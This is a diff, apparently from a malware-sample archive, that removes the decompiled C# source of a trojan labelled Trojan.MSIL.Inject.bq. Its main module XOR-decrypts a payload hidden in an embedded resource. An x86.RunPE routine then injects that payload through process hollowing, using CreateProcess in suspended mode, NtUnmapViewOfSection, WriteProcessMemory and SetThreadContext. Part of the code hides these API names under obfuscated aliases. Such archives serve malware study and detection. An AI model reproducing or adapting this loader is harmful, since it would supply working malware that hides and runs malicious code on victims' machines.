num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr baseAddr2 = num3;
byte[] buff = dst2;
num2 = new IntPtr(dst2.Length);
IntPtr size3 = num2;
ref IntPtr local1 = ref numRead;
flag = x86.Win32.hhh(hProc2, baseAddr2, buff, size3, ref local1);
IntPtr hProc3 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr addr2 = num3;
num2 = new IntPtr(dst1[2]);
IntPtr size4 = num2;
int newProt = x86.prot[dst1[9] >> 29 & 7];
int num6;
ref int local2 = ref num6;
flag = x86.Win32.biatch(hProc3, addr2, size4, newProt, ref local2);
checked { ++num5; }
}
IntPtr hProc4 = pInfo[0];
num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr baseAddr3 = num3;
byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
num2 = new IntPtr(4);
IntPtr size5 = num2;
ref IntPtr local = ref numRead;
flag = x86.Win32.hhh(hProc4, baseAddr3, bytes1, size5, ref local);
ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
x86.Win32.suce(pInfo[1], ctxt);
}
x86.Win32.pute(pInfo[1]);
}
[SuppressUnmanagedCodeSecurity]
private class Win32
{
[DebuggerNonUserCode]
public Win32()
{
}
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool Inventiondumem(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool f564gs(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
public static extern uint f564gsf(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool fzezf(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
IntPtr bufrSize,
ref IntPtr numRead);
[DllImport("kernel32")]
public static extern int pute(IntPtr hThr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool suce(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
public static extern IntPtr tobe(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool biatch(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int newProt,
ref int oldProt);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool hhh(
IntPtr hProc,
IntPtr baseAddr,
byte[] buff,
IntPtr size,
ref IntPtr numRead);
}
}
}

13
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/AssemblyInfo.cs
View File

@ -1,13 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("Cursor")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyDescription("1")]
[assembly: AssemblyProduct("Cursor")]
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("728093e4-7457-46be-8e8e-0fdee382cfff")]
[assembly: AssemblyVersion("1.0.0.0")]

54
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/Module1.cs
View File

@ -1,54 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.Module1
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Cursor
{
[StandardModule]
internal sealed class Module1
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
[STAThread]
public static void Main()
{
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
IntPtr source = Module1.LoadResource(moduleHandle, resource);
int length = Module1.SizeofResource(moduleHandle, resource);
byte[] numArray = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, numArray, 0, length);
int int32 = BitConverter.ToInt32(numArray, checked (numArray.Length - 4));
byte[] bytes = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[checked (numArray.Length - 3 + 1)]);
Random random = new Random(int32);
byte[] buffer = new byte[checked (bytes.Length - 1 + 1)];
random.NextBytes(buffer);
int num = checked (bytes.Length - 1);
int index = 0;
while (index <= num)
{
bytes[index] = (byte) ((int) bytes[index] ^ (int) buffer[index]);
checked { ++index; }
}
x86.RunPE(bytes, Process.GetCurrentProcess().MainModule.FileName);
}
}
}

23
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/My/MyApplication.cs
View File

@ -1,23 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyApplication
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}

24
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/My/MyComputer.cs
View File

@ -1,24 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyComputer
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}

194
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/My/MyProject.cs
View File

@ -1,194 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyProject
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace Cursor.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}

36
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/My/MySettings.cs
View File

@ -1,36 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettings
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default
{
get
{
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}

31
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/My/MySettingsProperty.cs
View File

@ -1,31 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettingsProperty
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[DebuggerNonUserCode]
[HideModuleName]
[StandardModule]
[CompilerGenerated]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}

46
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/My/Resources/Resources.cs
View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.Resources.Resources
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Cursor.My.Resources
{
[HideModuleName]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[StandardModule]
[DebuggerNonUserCode]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Cursor.My.Resources.Resources.resourceMan, (object) null))
Cursor.My.Resources.Resources.resourceMan = new ResourceManager("Cursor.Resources", typeof (Cursor.My.Resources.Resources).Assembly);
return Cursor.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Cursor.My.Resources.Resources.resourceCulture;
set => Cursor.My.Resources.Resources.resourceCulture = value;
}
}
}

120
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/Resources.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

52
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/Trojan.MSIL.Inject.bq.csproj
View File

@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{A5CB47C3-499A-4FEA-80C9-CB34378096CB}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Cursor</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Cursor</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="x86.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/Trojan.MSIL.Inject.bq.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cursor", "Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.csproj", "{A5CB47C3-499A-4FEA-80C9-CB34378096CB}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{A5CB47C3-499A-4FEA-80C9-CB34378096CB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{A5CB47C3-499A-4FEA-80C9-CB34378096CB}.Debug|Any CPU.Build.0 = Debug|Any CPU
{A5CB47C3-499A-4FEA-80C9-CB34378096CB}.Release|Any CPU.ActiveCfg = Release|Any CPU
{A5CB47C3-499A-4FEA-80C9-CB34378096CB}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

170
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14/x86.cs
View File

@ -1,170 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.x86
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Inject.bq-12dc665d332540a2debcd4a6a7aef85cfaa2832a4aa90b7888d45a6ab2ae5e14.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
namespace Cursor
{
public class x86
{
private static readonly int[] prot = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
[DebuggerNonUserCode]
public x86()
{
}
public static void RunPE(byte[] bytes, string surrogateProcess)
{
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
byte[] sInfo = new byte[68];
IntPtr[] pInfo = new IntPtr[4];
IntPtr num1;
if (!x86.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
return;
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
IntPtr bufr;
IntPtr numRead;
if (x86.Win32.GetThreadContext(pInfo[1], ctxt) && x86.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && x86.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U)
{
IntPtr hProc1 = pInfo[0];
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
IntPtr addr1 = num2;
IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
IntPtr size2 = num3;
IntPtr baseAddr1 = x86.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64);
bool flag = x86.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead);
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
IntPtr hProc2 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr baseAddr2 = num3;
byte[] buff = dst2;
num2 = new IntPtr(dst2.Length);
IntPtr size3 = num2;
ref IntPtr local1 = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1);
IntPtr hProc3 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr addr2 = num3;
num2 = new IntPtr(dst1[2]);
IntPtr size4 = num2;
int newProt = x86.prot[dst1[9] >> 29 & 7];
int num6;
ref int local2 = ref num6;
flag = x86.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2);
checked { ++num5; }
}
IntPtr hProc4 = pInfo[0];
num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr baseAddr3 = num3;
byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
num2 = new IntPtr(4);
IntPtr size5 = num2;
ref IntPtr local = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local);
ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
